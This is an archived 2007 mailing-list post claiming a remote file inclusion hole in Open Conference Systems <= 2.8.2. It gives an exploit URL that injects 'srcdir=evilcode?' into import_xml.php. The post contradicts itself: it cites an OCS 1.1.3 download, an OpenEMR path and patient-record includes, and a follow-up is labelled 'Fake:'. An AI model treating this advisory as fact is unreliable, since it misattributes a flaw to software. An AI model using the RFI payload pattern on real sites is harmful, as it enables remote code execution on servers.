Open Conference Systems = 2.8.2 Remote File Inclusion
- From: trzindan@xxxxxxxxxxx
- Date: 27 Jan 2007 12:52:38 -0000
#########################################################################
# Open Conference Systems <= 2.8.2 Remote File Inclusion
# Download Source : http://pkp.sfu.ca/ocs/download/ocs-1.1.3.tar.gz
#
# Found By : Tr_ZiNDaN
# Location : TurkeY -- #trzindan@xxxxxxxxxx
########################################################################
file ;
import_xml.php
########################################################################
bugs ;
at -- import_xml.php
include_once("$srcdir/patient.inc");
include_once("$srcdir/acl.inc");
########################################################################
exmple and methode exploit ;
http://localhost/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=evilcode?
########################################################################
Thanks;
str0ke,EL_MuHaMMeD,CyberWolf,EntRika,Blackwolf,Crackers_Child,KurtEfendy,
Canberx,Chaos,C0ld_Z3r0,Arslan,H0tturk,aLman,k1tk4t ;) MusLim Hackers
########################################################################
T3k T4b4nC4 2oo7~
- Follow-Ups:
- Re: Open Conference Systems = 2.8.2 Remote File Inclusion
- From: Stefano Zanero
- Fake: Open Conference Systems = 2.8.2 Remote File Inclusion
- From: bzhbfzj3001
- Re: Open Conference Systems = 2.8.2 Remote File Inclusion
- From: Michał Melewski
- Re: Open Conference Systems = 2.8.2 Remote File Inclusion
- Prev by Date: [USN-398-4] Firefox regression
- Next by Date: [ MDKSA-2007:028 ] - Updated ulogd packaged to address buffer overflow vulnerability
- Previous by thread: [USN-398-4] Firefox regression
- Next by thread: Re: Open Conference Systems = 2.8.2 Remote File Inclusion
- Index(es):
